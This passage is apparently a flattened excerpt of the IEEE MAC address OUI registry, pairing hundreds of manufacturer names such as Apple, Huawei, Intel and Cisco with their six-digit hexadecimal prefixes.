AzureWave Technology Inc. 0055B1 Shanghai Baud Data Communication Co.,Ltd. 74901F Ragile Networks Inc. 088FC3 COMPAL INFORMATION (KUNSHAN) CO., LTD. 9CBF0D Framework Computer LLC C0252F SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 683E26 Intel Corporate 8C554A Intel Corporate 549FC6 Cisco Systems, Inc F01D2D Cisco Systems, Inc 1CA852 SENSAIO PTE LTD 401C83 Intel Corporate 443B32 Intelbras 88892F HUAWEI TECHNOLOGIES CO.,LTD 28E5B0 HUAWEI TECHNOLOGIES CO.,LTD 8CD67F EM Microelectronic 34916F UserGate Ltd. 0C8B7D Vizio, Inc 0023E9 F5 Networks, Inc. 40F078 Cisco Systems, Inc 78D71A Ciena Corporation 142C78 GooWi Wireless Technology Co., Limited 98FC84 IEEE Registration Authority 5C91FD Jaewoncnc EC3EB3 Zyxel Communications Corporation D8A491 Huawei Device Co., Ltd. 681324 Huawei Device Co., Ltd. A8C092 Huawei Device Co., Ltd. EC4D3E Beijing Xiaomi Mobile Software Co., Ltd 24470E PentronicAB FC449F zte corporation 3C7C3F ASUSTek COMPUTER INC. F82E3F HUAWEI TECHNOLOGIES CO.,LTD 90A5AF HUAWEI TECHNOLOGIES CO.,LTD 0476B0 Cisco Systems, Inc 9860CA Apple, Inc. 4490BB Apple, Inc. 34FD6A Apple, Inc. 443583 Apple, Inc. 245F9F Huawei Device Co., Ltd. CCB0A8 Huawei Device Co., Ltd. 54778A Hewlett Packard Enterprise 9C6B37 Renesas Electronics (Penang) Sdn. Bhd. A83759 Huawei Device Co., Ltd. 50F7ED Huawei Device Co., Ltd. 4CB99B WEIFANG GOERTEK ELECTRONICS CO.,LTD BC7E8B Samsung Electronics Co.,Ltd 8060B7 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 24B105 Prama Hikvision India Private Limited 709CD1 Intel Corporate 4CAEEC Guangzhou limee technology co.,LTD 6433DB Texas Instruments A406E9 Texas Instruments B0B113 Texas Instruments 502873 Huawei Device Co., Ltd. 20F44F Nokia 0C31DC HUAWEI TECHNOLOGIES CO.,LTD 40DDD1 Beautiful Card Corporation C0E7BF Sichuan AI-Link Technology Co., Ltd. 90AAC3 Hitron Technologies. Inc 44917C HMD Global Oy 3420E3 Ruckus Wireless 78719C ARRIS Group, Inc. DC7223 Hui Zhou Gaoshengda Technology Co.,LTD 345594 FUJIAN STAR-NET COMMUNICATION CO.,LTD 4C93A6 IEEE Registration Authority CC47BD Rhombus Systems 40AA56 China Dragon Technology Limited 68545A Intel Corporate 001E31 infomark 3CE3E7 China Mobile Group Device Co.,Ltd. 782B64 Bose Corporation D4F756 zte corporation 346D9C Carrier Corporation 7CF9A0 Fiberhome Telecommunication Technologies Co.,LTD 6CA4D1 Fiberhome Telecommunication Technologies Co.,LTD 5488DE Cisco Systems, Inc 24FD0D Intelbras E0693A Innophase Inc. 0002AC 3PAR data A446B4 Huawei Device Co., Ltd. DCD444 Huawei Device Co., Ltd. 70828E OleumTech Corporation 8C85C1 Aruba, a Hewlett Packard Enterprise Company 20A171 Amazon Technologies Inc. EC6C9A Arcadyan Corporation 54AB3A Quanta Computer Inc. E89A8F Quanta Computer Inc. C80210 LG Innotek 001EB2 LG Innotek C086B3 Shenzhen Voxtech Co., Ltd. 44ADB1 Sagemcom Broadband SAS 0CC844 Cambridge Mobile Telematics, Inc. E0B260 TENO NETWORK TECHNOLOGIES COMPANY LIMITED 482335 Dialog Semiconductor Hellas SA E8DA20 Nintendo Co.,Ltd 3C53D7 CEDES AG 58F2FC Huawei Device Co., Ltd. 507043 SKY UK LIMITED 4401BB SHENZHEN BILIAN ELECTRONIC CO.,LTD E8136E HUAWEI TECHNOLOGIES CO.,LTD 4CAE13 HUAWEI TECHNOLOGIES CO.,LTD 4C2EFE Shenzhen Comnect Technology Co.,LTD 10BC97 vivo Mobile Communication Co., Ltd. D01411 IEEE Registration Authority A0D83D Fiberhome Telecommunication Technologies Co.,LTD 643AEA Cisco Systems, Inc 1C98C1 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. A09B17 Taicang T&W Electronics E06CA6 Creotech Instruments S.A. 44680C Wacom Co.,Ltd. 980E24 Phytium Technology Co.,Ltd. A830BC Samsung Electronics Co.,Ltd 7846D4 Samsung Electronics Co.,Ltd 6888A1 Universal Electronics, Inc. C0E3A0 Renesas Electronics (Penang) Sdn. Bhd. 34D262 SZ DJI TECHNOLOGY CO.,LTD 8CE468 Guangzhou Sageran Technology Co., Ltd. 2848E7 Huawei Device Co., Ltd. E4268B Huawei Device Co., Ltd. E43EC6 HUAWEI TECHNOLOGIES CO.,LTD 38881E HUAWEI TECHNOLOGIES CO.,LTD 2CDB07 Intel Corporate 988D46 Intel Corporate 0063DE CLOUDWALK TECHNOLOGY CO.,LTD 60A423 Silicon Laboratories 3C4DBE Apple, Inc. 48262C Apple, Inc. 147DDA Apple, Inc. C4910C Apple, Inc. 001693 PowerLink Technology Inc. AC1F09 shenzhen RAKwireless technology Co.,Ltd 10F920 Cisco Systems, Inc 9077EE Cisco Systems, Inc 3C13CC Cisco Systems, Inc 60AAEF Huawei Device Co., Ltd. D0F3F5 Huawei Device Co., Ltd. 2479EF Greenpacket Berhad, Taiwan B05CDA HP Inc. AC2334 Infinix mobility limited 002B67 LCFC(HeFei) Electronics Technology co., ltd F8BC0E eero inc. E01995 Nutanix FCBC0E Zhejiang Cainiao Supply Chain Management Co., Ltd 2400FA China Mobile (Hangzhou) Information Technology Co., Ltd 50E039 Zyxel Communications Corporation B85776 lignex1 2CD066 Xiaomi Communications Co Ltd 9016BA HUAWEI TECHNOLOGIES CO.,LTD D44649 HUAWEI TECHNOLOGIES CO.,LTD 9400B0 HUAWEI TECHNOLOGIES CO.,LTD F85128 SimpliSafe 6C9961 Sagemcom Broadband SAS 206980 Apple, Inc. D8DC40 Apple, Inc. 805FC5 Apple, Inc. DCBD7A Guangzhou Shiyuan Electronic Technology Company Limited 342EB7 Intel Corporate BC13A8 Shenzhen YOUHUA Technology Co., Ltd 94E3EE zte corporation 000FA4 Sprecher Automation GmbH 0024A2 Hong Kong Middleware Technology Limited 18DFC1 Aetheros E44122 OnePlus Technology (Shenzhen) Co., Ltd 9C19C2 Dongguan Liesheng Electronic Co., Ltd. BC26A1 FACTORY FIVE Corporation B01B7C Ontrol A.S. 001C70 NOVACOMM LTDA 9CEDFA EVUlution AG EC63ED Hyundai Autoever Corp. 1C1338 Kimball Electronics Group, LLC 2468B0 Samsung Electronics Co.,Ltd 30FCEB LG Electronics (Mobile Communications) FC71FA Trane Technologies 0002D8 BRECIS Communications Corporation B4EF1C 360 AI Technology Co.Ltd B04502 Huawei Device Co., Ltd. 1C1FF1 Huawei Device Co., Ltd. 14DE39 Huawei Device Co., Ltd. 0001CC Japan Total Design Communication Co., Ltd. 04F5F4 Proxim Wireless 008016 WANDEL AND GOLTERMANN 74CBF3 Lava international limited 84A3B5 Propulsion systems B8F009 Espressif Inc. A4B1C1 Intel Corporate 402F86 LG Innotek A4C54E Huawei Device Co., Ltd. D4BBE6 Huawei Device Co., Ltd. 40B6E7 Huawei Device Co., Ltd. D0B45D Huawei Device Co., Ltd. 8836CF Huawei Device Co., Ltd. 009EEE Positivo Tecnologia S.A. 00092E B&Tech System Inc. D41AC8 Nippon Printer Engineering 5061F6 Universal Electronics, Inc. F4EB9F Ellu Company 2019 SL E898C2 ZETLAB Company 0C817D EEP Elektro-Elektronik Pranjic GmbH 64DDE9 Xiaomi Communications Co Ltd 4C4088 SANSHIN ELECTRONICS CO.,LTD. DCD2FC HUAWEI TECHNOLOGIES CO.,LTD 60F262 Intel Corporate C8675E Extreme Networks, Inc. C8BCE5 Sense Things Japan INC. F45420 TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO C413E2 Extreme Networks, Inc. 90B832 Extreme Networks, Inc. 9C5D12 Extreme Networks, Inc. F09CE9 Extreme Networks, Inc. D422CD Xsens Technologies B.V. F0D5BF Intel Corporate E8B470 IEEE Registration Authority 00A058 GLORY, LTD. 7C9EBD Espressif Inc. 1C0219 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 9C611D Panasonic Corporation of North America 388479 Cisco Meraki C8B29B Intel Corporate CC418E MSA Innovation E48326 HUAWEI TECHNOLOGIES CO.,LTD 447654 HUAWEI TECHNOLOGIES CO.,LTD 7CD9A0 HUAWEI TECHNOLOGIES CO.,LTD F033E5 HUAWEI TECHNOLOGIES CO.,LTD 487AFF ESSYS C8D778 BSH Hausgeraete GmbH CCA7C1 Google, Inc. 8C5FAD Fiberhome Telecommunication Technologies Co.,LTD ACC25D Fiberhome Telecommunication Technologies Co.,LTD C095DA NXP India Private Limited B42200 Brother Industries, LTD. 6849B2 CARLO GAVAZZI LTD 8C0C87 Nokia 6C6A77 Intel Corporate 1869D8 Tuya Smart Inc. 3C806B Hunan Voc Acoustics Technology Co., Ltd. 60DE35 GITSN, Inc. 28317E Hongkong Nano IC Technologies Co., Ltd B4F18C Huawei Device Co., Ltd. C432D1 Farlink Technology Limited DC9840 Microsoft Corporation B8CEF6 Mellanox Technologies, Inc. FC3964 ITEL MOBILE LIMITED 8C3B32 Microfan B.V. D0D3E0 Aruba, a Hewlett Packard Enterprise Company 3C58C2 Intel Corporate CCF9E4 Intel Corporate 645CF3 ParanTek Inc. 90749D IRay Technology Co., Ltd. 186F2D Shenzhen Sundray Technologies Company Limited F84FAD Hui Zhou Gaoshengda Technology Co.,LTD 4C0A3D ADNACOM INC. CC7F76 Cisco Systems, Inc A84122 China Mobile (Hangzhou) Information Technology Co.,Ltd. 206D31 FIREWALLA INC 14472D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 9405BB IEEE Registration Authority 40BC68 Wuhan Funshion Online Technologies Co.,Ltd B802A4 Aeonsemi, Inc. E8ABFA Shenzhen Reecam Tech.Ltd. E490FD Apple, Inc. 84AB1A Apple, Inc. 28401A C8 MediSensors, Inc. E45E37 Intel Corporate B0CCFE Huawei Device Co., Ltd. 540DF9 Huawei Device Co., Ltd. 006619 Huawei Device Co., Ltd. D06544 Apple, Inc. 6CDDBC Samsung Electronics Co.,Ltd CCD42E Arcadyan Corporation 000E9E Topfield Co., Ltd 90E2FC IEEE Registration Authority C853E1 Beijing Bytedance Network Technology Co., Ltd 483FDA Espressif Inc. E0BB9E Seiko Epson Corporation 48D24F Sagemcom Broadband SAS E4AAEC Tianjin Hualai Technology Co., Ltd 5894B2 BrainCo B09575 TP-LINK TECHNOLOGIES CO.,LTD. 000C1E Global Cache F008D1 Espressif Inc. 14AE85 IEEE Registration Authority 14169D Cisco Systems, Inc 48A2E6 Resideo 94BE46 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 6C5D3A Microsoft Corporation ACF8CC ARRIS Group, Inc. 8C5A25 ARRIS Group, Inc. 2CDCD7 AzureWave Technology Inc. C8C750 Motorola Mobility LLC, a Lenovo Company B4B055 HUAWEI TECHNOLOGIES CO.,LTD 048C16 HUAWEI TECHNOLOGIES CO.,LTD 98DD5B TAKUMI JAPAN LTD 3C5CF1 eero inc. 9C54DA SkyBell Technologies Inc. 4C494F zte corporation C4741E zte corporation 001D7D GIGA-BYTE TECHNOLOGY CO.,LTD. 8CC681 Intel Corporate DC8983 Samsung Electronics Co.,Ltd 5CCB99 Samsung Electronics Co.,Ltd 90B144 Samsung Electronics Co.,Ltd D45D64 ASUSTek COMPUTER INC. D46075 Baidu Online Network Technology (Beijing) Co., Ltd 78C5F8 Huawei Device Co., Ltd. 5C78F8 Huawei Device Co., Ltd. B827C5 Huawei Device Co., Ltd. 58278C BUFFALO.INC 140AC5 Amazon Technologies Inc. 48DD0C eero inc. 940C98 Apple, Inc. E8FBE9 Apple, Inc. 38EC0D Apple, Inc. 2083F8 Advanced Digital Broadcast SA 2CE310 Stratacache B0735D Huawei Device Co., Ltd. F0B4D2 D-Link International 1C6F65 GIGA-BYTE TECHNOLOGY CO.,LTD. 00241D GIGA-BYTE TECHNOLOGY CO.,LTD. E47C65 Sunstar Communication Technology Co., Ltd 142A14 ShenZhen Selenview Digital Technology Co.,Ltd B86142 Beijing Tricolor Technology Co., Ltd FC8E5B China Mobile Iot Limited company 384B5B ZTRON TECHNOLOGY LIMITED A4307A Samsung Electronics Co.,Ltd 00A0B3 ZYKRONIX 34E3DA Hoval Aktiengesellschaft D87E76 ITEL MOBILE LIMITED 200A0D IEEE Registration Authority E4F327 ATOL LLC 6819AC Guangzhou Xianyou Intelligent Technogoly CO., LTD E82E0C NETINT Technologies Inc. 1892A4 Ciena Corporation 14115D Skyworth Digital Technology(Shenzhen) Co.,Ltd 502DBB GD Midea Air-Conditioning Equipment Co.,Ltd. 3C22FB Apple, Inc. 5C3A3D zte corporation 7CA1AE Apple, Inc. 30FD65 HUAWEI TECHNOLOGIES CO.,LTD 5C3A45 CHONGQING FUGUI ELECTRONICS CO.,LTD. 404C77 ARRIS Group, Inc. 10082C Texas Instruments A897CD ARRIS Group, Inc. A03C31 Shenzhen Belon Technology CO.,LTD 58EAFC ELL-IoT Inc 90B8E0 SHENZHEN YANRAY TECHNOLOGY CO.,LTD 2C4CC6 Murata Manufacturing Co., Ltd. 80E455 New H3C Technologies Co., Ltd 00909E Critical IO, LLC 9013DA Athom B.V. D49E3B Guangzhou Shiyuan Electronic Technology Company Limited DC4BDD Shenzhen SuperElectron Technology Co.,Ltd. C0B5CD Huawei Device Co., Ltd. 4C5077 Huawei Device Co., Ltd. 38E8EE Nanjing Youkuo Electric Technology Co., Ltd 4CBC72 Primex Wireless 6802B8 Compal Broadband Networks, Inc. 3463D4 BIONIX SUPPLYCHAIN TECHNOLOGIES SLU 08F7E9 HRCP Research and Development Partnership C809A8 Intel Corporate 748B34 Shanghai Smart System Technology Co., Ltd 9CF531 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 440377 IEEE Registration Authority 0812A5 Amazon Technologies Inc. DCDCE2 Samsung Electronics Co.,Ltd A0AC69 Samsung Electronics Co.,Ltd 1089FB Samsung Electronics Co.,Ltd D4772B Nanjing Ztlink Network Technology Co.,Ltd 64F9C0 ANALOG DEVICES F89E28 Cisco Meraki BCA511 NETGEAR 34ED1B Cisco Systems, Inc F8C4F3 Shanghai Infinity Wireless Technologies Co.,Ltd. 18D0C5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 70F82B DWnet Technologies(Suzhou) Corporation D4F5EF Hewlett Packard Enterprise 44CB8B LG Innotek B4055D Inspur Electronic Information Industry Co.,Ltd. EC1BBD Silicon Laboratories 80647A Ola Sense Inc C0B883 Intel Corporate 10DCB6 IEEE Registration Authority D8A315 vivo Mobile Communication Co., Ltd. 30E98E HUAWEI TECHNOLOGIES CO.,LTD C4447D HUAWEI TECHNOLOGIES CO.,LTD C4E90A D-Link International ACBD70 Huawei Device Co., Ltd. 142475 4DReplay, Inc 24418C Intel Corporate 44EFBF China Dragon Technology Limited 4CB44A NANOWAVE Technologies Inc. F8D027 Seiko Epson Corporation 5C666C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C4BF9 IEEE Registration Authority 88D5A8 ITEL MOBILE LIMITED B47C59 Jiangsu Hengxin Technology Co.,Ltd. 300D9E Ruijie Networks Co.,LTD 9C93B0 Megatronix (Beijing) Technology Co., Ltd. B81F5E Apption Labs Limited D81265 CHONGQING FUGUI ELECTRONICS CO.,LTD. 8C3A7E Universal Electronics, Inc. 208593 IEEE Registration Authority ECFA5C Beijing Xiaomi Electronics Co., Ltd. 28BD89 Google, Inc. 984827 TP-LINK TECHNOLOGIES CO.,LTD. 14A1BF ASSA ABLOY Korea Co., Ltd Unilock 9483C4 GL Technologies (Hong Kong) Limited 64AEF1 Qingdao Hisense Electronics Co.,Ltd. 048C9A Huawei Device Co., Ltd. EC3CBB Huawei Device Co., Ltd. 1CEA0B Edgecore Networks Corporation BCB0E7 HUAWEI TECHNOLOGIES CO.,LTD 5434EF HUAWEI TECHNOLOGIES CO.,LTD ACE342 HUAWEI TECHNOLOGIES CO.,LTD 9017C8 HUAWEI TECHNOLOGIES CO.,LTD E4922A DBG HOLDINGS LIMITED 2C641F Vizio, Inc F8B46A Hewlett Packard 70441C SHENZHEN KAIFA TECHNOLOGY CO.,LTD. 04819B SKY UK LIMITED 4801C5 OnePlus Technology (Shenzhen) Co., Ltd 98523D Sunitec Enterprise Co.,Ltd D015A6 Aruba, a Hewlett Packard Enterprise Company 18BF1C Jiangsu Huitong Group Co.,Ltd. 207759 OPTICAL NETWORK VIDEO TECHNOLOGIES (SHENZHEN) CO., LTD. 889D98 Allied-telesisK.K. 000163 Cisco Systems, Inc E00084 HUAWEI TECHNOLOGIES CO.,LTD B4EE25 Shenzhen Belon Technology CO.,LTD C82B96 Espressif Inc. DCF8B9 zte corporation 189088 eero inc. 4C56DF Targus US LLC 54E7D5 Sun Cupid Technology (HK) LTD 241510 IEEE Registration Authority 6C4D51 Shenzhen Ceres Technology Co., Ltd. 0000DE CETIA F43E66 Bee Computing (HK) Limited DC396F AVM Audiovisuelles Marketing und Computersysteme GmbH B4C476 Wuhan Maritime Communication Research Institute 683489 LEA Professional 94BF80 zte corporation 9C3A9A Shenzhen Sundray Technologies Company Limited 3CECEF Super Micro Computer, Inc. 2CA89C Creatz inc. 4CDC0D Coral Telecom Limited C4E1A1 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD ACC358 Continental Automotive Czech Republic s.r.o. F09919 Garmin International 60634C D-Link International 6070C0 Apple, Inc. F0C371 Apple, Inc. 1855E3 Apple, Inc. E450EB Apple, Inc. 886440 Apple, Inc. 64FF0A Wistron Neweb Corporation B46C47 Panasonic Appliances Company 44422F TESTOP CO.,LTD. 549C27 Plasma Cloud Limited 541589 MCS Logic Inc. 845733 Microsoft Corporation 6029D5 DAVOLINK Inc. 509744 Integrated Device Technology (Malaysia) Sdn. Bhd. 58F39C Cisco Systems, Inc 002423 AzureWave Technologies (Shanghai) Inc. 8C593C IEEE Registration Authority C4411E Belkin International Inc. 0077E4 Nokia Solutions and Networks GmbH & Co. KG 380118 ULVAC,Inc. 14ADCA China Mobile Iot Limited company 987A14 Microsoft Corporation 00AD63 Dedicated Micros Malta LTD B0B5E8 Ruroc LTD 04D590 Fortinet, Inc. E415F6 Texas Instruments C83DDC Xiaomi Communications Co Ltd 809133 AzureWave Technology Inc. 1819D6 Samsung Electronics Co.,Ltd 70FC8F FREEBOX SAS 501B32 Taicang T&W Electronics E828C1 Eltex Enterprise Ltd. 78D347 Ericsson AB F82387 Shenzhen Horn Audio Co.,Ltd. BC98DF Motorola Mobility LLC, a Lenovo Company CC9070 Cisco Systems, Inc 2841C6 HUAWEI TECHNOLOGIES CO.,LTD F41D6B HUAWEI TECHNOLOGIES CO.,LTD 7CEC9B Fuzhou Teraway Information Technology Co.,Ltd A4A179 Nanjing dianyan electric power automation co. LTD 68DB67 Nantong Coship Electronics Co., Ltd. AC4228 Parta Networks B4F58E HUAWEI TECHNOLOGIES CO.,LTD 980D67 Zyxel Communications Corporation C48FC1 DEEPTRACK S.L.U. B0A6F5 Xaptum, Inc. ACF5E6 Cisco Systems, Inc BC9FE4 Aruba, a Hewlett Packard Enterprise Company E4F3E8 Shenzhen SuperElectron Technology Co.,Ltd. CCA12B TCL King Electrical Appliances (Huizhou) Co., Ltd F4323D Sichuan tianyi kanghe communications co., LTD 70DDA8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C6F9C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 782C29 New H3C Technologies Co., Ltd D4D252 Intel Corporate 58A023 Intel Corporate DCB082 Nokia F8C397 NZXT Corp. Ltd. B0AAD2 Sichuan tianyi kanghe communications co., LTD 001EA3 Nokia Danmark A/S 38F32E Skullcandy DC2AA1 MedHab LLC AC00D0 zte corporation E8C417 Fiberhome Telecommunication Technologies Co.,LTD F8B797 NEC Platforms, Ltd. 702E80 DIEHL Connectivity Solutions 08A6BC Amazon Technologies Inc. 2C58E8 HUAWEI TECHNOLOGIES CO.,LTD 84B8B8 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. D041C9 Fiberhome Telecommunication Technologies Co.,LTD E8018D Fiberhome Telecommunication Technologies Co.,LTD 109397 ARRIS Group, Inc. 5075F1 ARRIS Group, Inc. ACA46E SHENZHEN GONGJIN ELECTRONICS CO.,LT C8B422 ASKEY COMPUTER CORP 18BC5A Zhejiang Tmall Technology Co., Ltd. C4C138 OWLink Technology Inc 981E19 Sagemcom Broadband SAS 84B866 Beijing XiaoLu technology co. LTD 94EE9F HMD Global Oy C46516 Hewlett Packard E41E0A IEEE Registration Authority 205869 Ruckus Wireless CC37AB Edgecore Networks Corporation 907841 Intel Corporate C86314 IEEE Registration Authority 1CB3E9 Shenzhen Zhongke United Communication Technology E8ECA3 Dongguan Liesheng Electronic Co.Ltd 1422DB eero inc. 243154 HUAWEI TECHNOLOGIES CO.,LTD AC37C9 RAID Incorporated 80FD7A BLU Products Inc 543B30 duagon AG 8C965F Shandong Zhongan Technology Co., Ltd. C0074A Brita GmbH E8B2FE HUMAX Co., Ltd. 10A3B8 Iskratel d.o.o. 70CD91 TERACOM TELEMATICA S.A B0BB8B WAVETEL TECHNOLOGY LIMITED 18399C Skorpios Technologies 94C2BD TECNOBIT 4883B4 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0017FA Microsoft Corporation 701E68 Hanna Instruments, Inc. 2034FB Xiaomi Communications Co Ltd A89CED Xiaomi Communications Co Ltd 6CA604 ARRIS Group, Inc. 94BFC4 Ruckus Wireless 34A8EB Apple, Inc. A483E7 Apple, Inc. F4AFE7 Apple, Inc. AC88FD Apple, Inc. 941625 Apple, Inc. B4A305 XIAMEN YAXON NETWORK CO., LTD. 803E48 SHENZHEN GONGJIN ELECTRONICS CO.,LT 24586E zte corporation 243F30 Oxygen Broadband s.a. 3C9180 Liteon Technology Corporation 20326C Samsung Electronics Co.,Ltd 6489F1 Samsung Electronics Co.,Ltd 503E7C LeiShen Intelligent System Co.Ltd BCCF4F Zyxel Communications Corporation 0CE041 iDruide B88FB4 JABIL CIRCUIT ITALIA S.R.L 00124E XAC AUTOMATION CORP. 88E034 Shinwa industries(China) ltd. 380025 Intel Corporate C010B1 HMD Global Oy 90895F WEIFANG GOERTEK ELECTRONICS CO.,LTD 48D845 Shenzhen Mainuoke Electronics Co., Ltd 0052C2 peiker acustic GmbH D0EC35 Cisco Systems, Inc D058C0 Qingdao Haier Multimedia Limited. F8D478 Flextronics Tech.(Ind) Pvt Ltd 3821C7 Aruba, a Hewlett Packard Enterprise Company A45F9B Nexell DC6723 barox Kommunikation GmbH 9844B6 INFRANOR SAS 38839A SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. C8F6C8 Fiberhome Telecommunication Technologies Co.,LTD 1C3B8F Selve GmbH & Co. KG E4E749 Hewlett Packard 48BD0E Quanta Storage Inc. 000F69 SEW Eurodrive GmbH & Co. KG 8C53D2 China Mobile Group Device Co.,Ltd. D45383 Murata Manufacturing Co., Ltd. A04246 IT Telecom Co., Ltd. 0CF475 Zliide Technologies ApS 44B462 Flextronics Tech.(Ind) Pvt Ltd 48C3B0 Pharos Co.Ltd DC58BC Thomas-Krenn.AG 001025 Grayhill, Inc 70EA1A Cisco Systems, Inc 808A8B vivo Mobile Communication Co., Ltd. 68FF7B TP-LINK TECHNOLOGIES CO.,LTD. 808F1D TP-LINK TECHNOLOGIES CO.,LTD. 94B40F Aruba, a Hewlett Packard Enterprise Company 001A1E Aruba, a Hewlett Packard Enterprise Company 00246C Aruba, a Hewlett Packard Enterprise Company E458E7 Samsung Electronics Co.,Ltd 00104A The Parvus Corporation E85BB7 Ample Systems Inc. 94677E Belden India Private Limited ECC57F Suzhou Pairlink Network Technology AC5775 HMD Global Oy AC4330 Versa Networks A86DAA Intel Corporate 38C2BA CCTV NEOTECH A0F9B7 Ademco Smart Homes Technology(Tianjin)Co.,Ltd. D43A2E SHENZHEN MTC CO LTD 50AD92 NX Technologies CC3FEA BAE Systems, Inc A83CCB ROSSMA 001BFB ALPSALPINE CO,.LTD 30C3D9 ALPSALPINE CO,.LTD 6CA936 DisplayLink (UK) Ltd 708540 Skyworth Digital Technology(Shenzhen) Co.,Ltd 78B213 DWnet Technologies(Suzhou) Corporation 94E0D6 China Dragon Technology Limited 08F1EA Hewlett Packard Enterprise 7CDB98 ASKEY COMPUTER CORP B4A9FC Quanta Computer Inc. 380B3C Texas Instruments 6845F1 TOSHIBA CLIENT SOLUTIONS CO., LTD. F00DF5 ACOMA Medical Industry Co,. Ltd. 58C232 NEC Corporation 4CF2BF Cambridge Industries(Group) Co.,Ltd. CC9EA2 Amazon Technologies Inc. 381D14 Skydio Inc. 8CAEDB NAGTECH LLC 003217 Cisco Systems, Inc 0C9541 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. B40B78 Brusa Elektronik AG 207918 Intel Corporate 88D211 Eko Devices, Inc. B8C227 PSTec 9C8CD8 Hewlett Packard Enterprise A48CC0 JLG Industries, Inc. E82C6D SmartRG, Inc. 04F9D9 Speaker Electronic(Jiashan) Co.,Ltd DC080F Apple, Inc. F8E94E Apple, Inc. EC2CE2 Apple, Inc. 40BC60 Apple, Inc. E83617 Apple, Inc. 9C648B Apple, Inc. 344262 Apple, Inc. 14D00D Apple, Inc. C03DD9 MitraStar Technology Corp. 2CAA8E Wyze Labs Inc 703A51 Xiaomi Communications Co Ltd 3C286D Google, Inc. 00093A Molex CMS 74F737 KCE 48A493 TAIYO YUDEN CO.,LTD DC48B2 Baraja Pty. Ltd. ACAE19 Roku, Inc 181E95 AuVerte 48E695 Insigma Inc B479C8 Ruckus Wireless 1CFD08 IEEE Registration Authority B8599F Mellanox Technologies, Inc. 706D15 Cisco Systems, Inc A4A1E4 Innotube, Inc. 98D3E7 Netafim L 9C6937 Qorvo International Pte. Ltd. C0BDC8 Samsung Electronics Co.,Ltd 647BCE Samsung Electronics Co.,Ltd A887B3 Samsung Electronics Co.,Ltd 6C006B Samsung Electronics Co.,Ltd 6CC7EC SAMSUNG ELECTRO-MECHANICS(THAILAND) D89685 GoPro B4F949 optilink networks pvt ltd 48352E Shenzhen Wolck Network Product Co.,LTD 04E598 Xiaomi Communications Co Ltd 001060 BILLIONTON SYSTEMS, INC. C4D489 JiangSu Joyque Information Industry Co.,Ltd B82CA0 Resideo 3C01EF Sony Corporation 3C3786 NETGEAR 74BFC0 CANON INC. F063F9 HUAWEI TECHNOLOGIES CO.,LTD 7CC385 HUAWEI TECHNOLOGIES CO.,LTD 900EB3 Shenzhen Amediatech Technology Co., Ltd. 00AD24 D-Link International 54068B Ningbo Deli Kebei Technology Co.LTD 549FAE iBASE Gaming Inc 548028 Hewlett Packard Enterprise 20B001 Technicolor Delivery Technologies Belgium NV F05494 Honeywell Connected Building 94EAEA TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 301389 Siemens AG, Automations & Drives, A0A4C5 Intel Corporate F4D108 Intel Corporate 60CE92 The Refined Industry Company Limited 48872D SHEN ZHEN DA XIA LONG QUE TECHNOLOGY CO.,LTD E81A58 TECHNOLOGIC SYSTEMS 105BAD Mega Well Limited B02A43 Google, Inc. 181DEA Intel Corporate 185680 Intel Corporate C8D9D2 Hewlett Packard 24FCE5 Samsung Electronics Co.,Ltd 809621 Lenovo 04BC87 Shenzhen JustLink Technology Co., LTD 54C33E Ciena Corporation 142233 Fiberhome Telecommunication Technologies Co.,LTD 6035C0 SFR 743400 MTG Co., Ltd. DC3757 Integrated Device Technology (Malaysia) Sdn. Bhd. 005099 3COM EUROPE LTD 78055F Shenzhen WYC Technology Co., Ltd. 1862E4 Texas Instruments BCB22B EM-Tech D4AB82 ARRIS Group, Inc. 704FB8 ARRIS Group, Inc. 0060EB FOURTHTRACK SYSTEMS EC79F2 Startel 00EABD Cisco Systems, Inc C474F8 Hot Pepper, Inc. 5CC999 New H3C Technologies Co., Ltd 00608C 3COM 00A024 3COM 0020AF 3COM 00104B 3COM B08BCF Cisco Systems, Inc C4985C Hui Zhou Gaoshengda Technology Co.,LTD 30A1FA HUAWEI TECHNOLOGIES CO.,LTD 645D86 Intel Corporate 001AC5 Keysight Technologies, Inc. 00201E NETQUEST CORPORATION 64628A evon GmbH 0415D9 Viwone 9CAA1B Microsoft Corporation A89A93 Sagemcom Broadband SAS 8C9246 Oerlikon Textile Gmbh&Co.KG ECB313 SHENZHEN GONGJIN ELECTRONICS CO.,LT 242E90 PALIT MICROSYSTEMS, LTD 000E94 Maas International BV 000C43 Ralink Technology, Corp. E00EE1 We Corporation Inc. 4017E2 INTAI TECHNOLOGY CORP. 4898CA Sichuan AI-Link Technology Co., Ltd. 247E51 zte corporation E8B541 zte corporation 0C9D92 ASUSTek COMPUTER INC. 0CCB85 Motorola Mobility LLC, a Lenovo Company 741F79 YOUNGKOOK ELECTRONICS CO.,LTD F8CC6E DEPO Electronics Ltd 3C8994 SKY UK LIMITED 582D34 Qingping Electronics (Suzhou) Co., Ltd 20DE88 IC Realtime LLC F4068D devolo AG 988ED4 ITEL MOBILE LIMITED E8A788 XIAMEN LEELEN TECHNOLOGY CO., LTD 482CA0 Xiaomi Communications Co Ltd A4E615 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD A85AF3 Shanghai Siflower Communication Technology Co., Ltd 70FD46 Samsung Electronics Co.,Ltd 8C83E1 Samsung Electronics Co.,Ltd 889F6F Samsung Electronics Co.,Ltd 5C63C9 Intellithings Ltd. 0C96E6 Cloud Network Technology (Samoa) Limited 001A31 SCAN 